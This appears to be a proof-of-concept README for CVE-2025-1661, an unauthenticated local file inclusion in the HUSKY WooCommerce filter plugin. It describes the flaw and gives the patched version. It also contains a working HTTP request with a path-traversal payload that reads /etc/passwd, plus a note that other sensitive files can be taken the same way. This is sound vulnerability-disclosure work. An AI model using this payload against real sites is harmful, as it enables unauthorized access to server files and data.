HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion (LFI)# CVE-2025-1661 - Unauthenticated Local File Inclusion (LFI) in HUSKY – Products Filter Professional for WooCommerce
## Description
The **HUSKY – Products Filter Professional for WooCommerce** plugin for WordPress is vulnerable to **Local File Inclusion (LFI)** in all versions up to and including **1.3.6.5** via the `template` parameter of the `woof_text_search` AJAX action.
This allows **unauthenticated attackers** to include and execute arbitrary files on the server, potentially leading to:
- **Bypassing access controls**
- **Extracting sensitive data**
- **Remote Code Execution (RCE)** if certain conditions are met (e.g., upload of "safe" file types)
## Severity: **Critical**
- **CVSS Score:** 9.8 (**Critical**)
- **CWE ID:** CWE-22 (Path Traversal)
- **EPS Score:** 0.00061
## Affected Versions
- **Vulnerable:** `<= 1.3.6.5`
- **Patched Version:** `1.3.6.6`
## Remediation
Update to version **1.3.6.6** or a newer patched version.
---
## Proof of Concept (PoC)
### Steps to Reproduce
1. Visit the target website.
2. Capture the request using **Burp Suite**.
3. Modify the request method to **POST** and add the following payload:
```http
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
action=woof_text_search&
```
4. If successful, the server will return the contents of `/etc/passwd`.
5. This can be used to extract other sensitive files from the server.
---
## References
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-filter/husky-products-filter-professional-for-woocommerce-1365-unauthenticated-local-file-inclusion)
- [WordPress Plugin Code](https://plugins.trac.wordpress.org/browser/woocommerce-products-filter/trunk/ext/by_text/index.php)
- [CVE Report](https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve)
---
## Disclaimer
This PoC is for **educational and research purposes only**. Unauthorized testing against systems without permission is illegal and unethical. Always seek **explicit authorization** before conducting any security testing.
[4.0K] /data/pocs/abd584cc2b3973d0d330383055e68a12cde8d6f4
├── [283K] lfi.png
└── [2.7K] README.md
0 directories, 2 files